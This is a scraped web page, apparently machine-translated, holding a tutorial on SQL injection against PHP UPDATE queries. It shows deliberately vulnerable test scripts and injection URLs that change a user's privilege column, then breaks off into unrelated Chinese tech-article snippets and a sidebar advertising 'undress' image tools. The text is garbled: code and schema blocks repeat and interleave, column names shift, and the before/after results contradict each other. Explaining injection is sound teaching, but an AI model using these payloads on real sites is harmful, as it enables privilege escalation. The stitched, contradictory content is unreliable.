1. Test environment:
SQL Query:$sql ";
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
2. Test database structure:
3. Test mode:
1. The variable does not contain '' or ""[MOD1]
The script only modifies the pass of user=’heige’. If groudid represents the user’s permission level, our purpose is to achieve it by constructing $p
For the purpose of modifying groupid:
Then we submit: http://127.0.0.1/test1.php?p=123456,groudid=1
Query in mysql:
-----start---
-- Database: `test`
--
-----start---
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 导出表中的数据 `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
-------------------------------------------------- --------
--
<!--p <--><br>
//test1.php Mod1 <br>
<br>
$servername = "localhost"; <br>
<br>
$dbusername = "root"; <br>
<br>
$dbpassword = ""; <br>
<br>
$dbname = "test"; <br>
<br>
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); <br>
<br>
$sql = "update userinfo set pass=$p where user=’heige’";//
<br>
$result = mysql_db_query($dbname, $sql); <br>
<br>
$userinfo = mysql_fetch_array($result); <br>
<br>
echo "
<p>SQL Query:$sql</p>
<p>"; <br>
<br>
?></p>
-- Table structure `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--Export the data in the table `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
?>
The grudid of user heige has been changed from 2 to 1 :)
So we can get that the injection without '' or "" update can be successful. This is our mode 1.
2. Variables with '' or ""[MOD2]
mysql> select * from userinfo;
+---------+-------+--------+
| grudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("Database connection failed");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
To close ‘we construct $p should be 123456’, grudid=’2 Submit:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 When gpc=on, ‘becomes’
The submitted statement becomes: SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’
mysql query:
| mysql> select * from userinfo; +---------+-------+--------------------+ | groudid | user | pass | +---------+-------+--------------------+ | 2 | heige | 123456’,groudid=’1 | +---------+-------+--------------------+ 1 row in set (0.00 sec) |
|
| grudid | user | pass | +---------+-------+--------------------+ | 2 | heige | 123456’,groudid=’1 | +---------+-------+--------------------+ 1 row in set (0.00 sec) |
The groudid has not been modified. So when the variable is '' or "", it is not injected at all? No. Let’s look at mode 2:
修复:谷歌浏览器更新检查失败错误代码3:0x80040154Apr 13, 2023 pm 05:46 PM谷歌浏览器是全球最受欢迎的浏览器之一,许多用户更喜欢将其用作 Windows PC 上的默认浏览器。Chrome 提供了广泛的功能,使浏览体验愉快而轻松,因此,它仍然是最受信任的浏览器之一。但是,就像任何其他浏览器一样,即使 Chrome 也有其自身的缺点,它同样容易在您最需要的时候出现错误和故障。一个这样的错误是错误代码 3:0x80040154,这发生在检查 Google Chrome 更新时。错误消息显示为“检查更新时发生错误。更新检查无法启动(错误代码 3:0x80080005)或(错误
如何在技嘉主板上设置键盘启动功能 (技嘉主板启用键盘开机方式)Dec 31, 2023 pm 05:15 PM技嘉的主板怎么设置键盘开机首先,要支持键盘开机,一定是PS2键盘!!设置步骤如下:第一步:开机按Del或者F2进入bios,到bios的Advanced(高级)模式普通主板默认进入主板的EZ(简易)模式,需要按F7切换到高级模式,ROG系列主板默认进入bios的高级模式(我们用简体中文来示范)第二步:选择到——【高级】——【高级电源管理(APM)】第三步:找到选项【由PS2键盘唤醒】第四步:这个选项默认是Disabled(关闭)的,下拉之后可以看到三种不同的设置选择,分别是按【空格键】开机、按组
CS玩家的首选:推荐的电脑配置Jan 02, 2024 pm 04:26 PM1.处理器在选择电脑配置时,处理器是至关重要的组件之一。对于玩CS这样的游戏来说,处理器的性能直接影响游戏的流畅度和反应速度。推荐选择IntelCorei5或i7系列的处理器,因为它们具有强大的多核处理能力和高频率,可以轻松应对CS的高要求。2.显卡显卡是游戏性能的重要因素之一。对于射击游戏如CS而言,显卡的性能直接影响游戏画面的清晰度和流畅度。建议选择NVIDIAGeForceGTX系列或AMDRadeonRX系列的显卡,它们具备出色的图形处理能力和高帧率输出,能够提供更好的游戏体验3.内存电
如何启用/禁用 VS Code 自动更新Apr 28, 2023 am 09:28 AM如果您正在使用VisualStudioCode(VSCode)并考虑如何禁用它的自动软件更新以及如何禁用其扩展的自动更新,那么请阅读本文。如果你不经常使用VSCode,隔了很长一段时间打开编辑器并想启用自动更新,本文也将指导你这样做。让我们详细讨论启用或禁用VSCode自动更新的不同方法。目录方法一:使用设置启用/禁用VSCode自动更新第一步:打开VS代码,在左下角点击齿轮状的符号。第2步:在出现的列表中单击设置。第3步:在搜索栏中输入更新并回车。查找更新:模式第4
广联达软件电脑配置推荐;广联达软件对电脑的配置要求Jan 01, 2024 pm 12:52 PM广联达软件是一家专注于建筑信息化领域的软件公司,其产品被广泛应用于建筑设计、施工、运营等各个环节。由于广联达软件功能复杂、数据量大,对电脑的配置要求较高。本文将从多个方面详细阐述广联达软件的电脑配置推荐,以帮助读者选择适合的电脑配置处理器广联达软件在进行建筑设计、模拟等操作时,需要进行大量的数据计算和处理,因此对处理器的要求较高。推荐选择多核心、高主频的处理器,如英特尔i7系列或AMDRyzen系列。这些处理器具有较强的计算能力和多线程处理能力,能够更好地满足广联达软件的需求。内存内存是影响计算
KDE Plasma 6.1 brings many enhancements to the popular Linux desktopJun 23, 2024 am 07:54 AMAfter several pre-releases, the KDE Plasma development team unveiled version 6.0 of its desktop environment for Linux and BSD systems on 28 February, using the Qt6 framework for the first time. KDE Plasma 6.1 now comes with a number of new features t
Microsoft compatibility telemetry占用高CPU的解决方法Mar 16, 2024 pm 10:16 PM我们在使用win10系统的时候有时候会遇到电脑变得卡顿的情况,然后我们在查看后台进程的时候会发现一个Microsoftcompatibilitytelemetry的进程占用资源特别的高,那么这是怎么回事?用户们可以尝试卸载三方防护软件后尝试干净启动来进行操作,下面就让本站来为用户们来仔细的介绍一下Microsoftcompatibilitytelemetry占用高CPU的解决方法吧。Microsoftcompatibilitytelemetry占用高CPU的解决方法方法一:卸载三方防护软件后尝试
SQL中UPDATE语句怎么用Jun 02, 2023 pm 09:13 PMSQLUPDATE语句Update语句用于修改表中的数据。语法如下:UPDATE表名称SET列名称=新值WHERE列名称=某值"Person"表:LastNameFirstNameAddressCityGatesBillXuanwumen10BeijingWilsonChamps-Elysees更新某一行中的一个列UPDATEPersonSETFirstName="Fred"WHERELastName="Wilson"结果:LastNa
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Dreamweaver Mac version
Visual web development tools
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
Atom editor mac version download
The most popular open source editor
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
SublimeText3 Chinese version
Chinese version, very easy to use
